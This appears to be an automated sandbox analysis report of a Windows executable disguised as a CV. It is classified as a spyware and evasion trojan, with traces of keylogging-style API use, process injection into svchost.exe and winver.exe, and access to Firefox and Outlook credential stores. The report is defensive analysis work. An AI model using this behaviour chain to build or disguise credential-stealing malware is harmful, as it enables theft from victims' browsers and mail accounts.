                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00116D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00116D07
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00102B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00102B37
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0012F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0012F7FF

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: This is a third-party compiled AutoIt script.0_2_000C3D19
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_35bb147a-9
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd7b9d64-c
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b08a08ae-9
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5ea29b1a-8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C9F3 NtClose,2_2_0042C9F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA5D NtAllocateVirtualMemory,2_2_0040AA5D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472F30 NtCreateSection,2_2_03472F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472C60 NtCreateKey,2_2_03472C60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473090 NtSetValueKey,2_2_03473090
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473D70 NtOpenThread,2_2_03473D70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D4650 NtSuspendThread,LdrInitializeThunk,5_2_046D4650
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D4340 NtSetContextThread,LdrInitializeThunk,5_2_046D4340
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2C60 NtCreateKey,LdrInitializeThunk,5_2_046D2C60
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_046D2C70
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_046D2CA0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_046D2D30
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_046D2D10
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_046D2DF0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2DD0 NtDelayExecution,LdrInitializeThunk,5_2_046D2DD0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_046D2EE0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_046D2E80
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2F30 NtCreateSection,LdrInitializeThunk,5_2_046D2F30
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2FE0 NtCreateFile,LdrInitializeThunk,5_2_046D2FE0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2FB0 NtResumeThread,LdrInitializeThunk,5_2_046D2FB0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2AF0 NtWriteFile,LdrInitializeThunk,5_2_046D2AF0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2AD0 NtReadFile,LdrInitializeThunk,5_2_046D2AD0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2B60 NtClose,LdrInitializeThunk,5_2_046D2B60
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_046D2BE0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_046D2BF0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_046D2BA0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D35C0 NtCreateMutant,LdrInitializeThunk,5_2_046D35C0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D39B0 NtGetContextThread,LdrInitializeThunk,5_2_046D39B0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2C00 NtQueryInformationProcess,5_2_046D2C00
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2CF0 NtOpenProcess,5_2_046D2CF0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2CC0 NtQueryVirtualMemory,5_2_046D2CC0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2D00 NtSetInformationFile,5_2_046D2D00
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2DB0 NtEnumerateKey,5_2_046D2DB0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2E30 NtWriteVirtualMemory,5_2_046D2E30
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2EA0 NtAdjustPrivilegesToken,5_2_046D2EA0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2F60 NtCreateProcessEx,5_2_046D2F60
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2FA0 NtQuerySection,5_2_046D2FA0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2F90 NtProtectVirtualMemory,5_2_046D2F90
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2AB0 NtWaitForSingleObject,5_2_046D2AB0
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D2B80 NtQueryInformationFile,5_2_046D2B80
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D3010 NtOpenDirectoryObject,5_2_046D3010
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D3090 NtSetValueKey,5_2_046D3090
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D3D70 NtOpenThread,5_2_046D3D70
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_046D3D10 NtOpenProcessToken,5_2_046D3D10
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_00379310 NtCreateFile,5_2_00379310
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_00379480 NtReadFile,5_2_00379480
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_00379570 NtDeleteFile,5_2_00379570
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_00379610 NtClose,5_2_00379610
                Source: C:\Windows\SysWOW64\winver.exe Code function: 5_2_00379780 NtAllocateVirtualMemory,5_2_00379780
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_00106606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00106606
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_000FACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_000FACC5
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_001079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001079D3
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2073753814.0000000004443000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2073871756.00000000045ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/13
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010CE7A GetLastError,FormatMessageW,0_2_0010CE7A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FAB84 AdjustTokenPrivileges,CloseHandle,0_2_000FAB84
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000FB134
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0010E1FD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00106532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00106532
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0011C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0011C18C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000C406B
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeFile created: C:\Users\user\AppData\Local\Temp\autEEE5.tmpJump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winver.exe, 00000005.00000003.2576231843.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2576231843.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2573732284.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4525083909.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4525083909.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4525083909.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2573787560.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: CV Lic H&S Olivetti Renzo.exeReversingLabs: Detection: 63%
                Source: CV Lic H&S Olivetti Renzo.exeVirustotal: Detection: 50%
                Source: unknownProcess created: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeStatic file information: File size 1207296 > 1048576
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: winver.pdb source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525085376.000000000049E000.00000002.00000001.01000000.00000005.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4524587511.000000000049E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
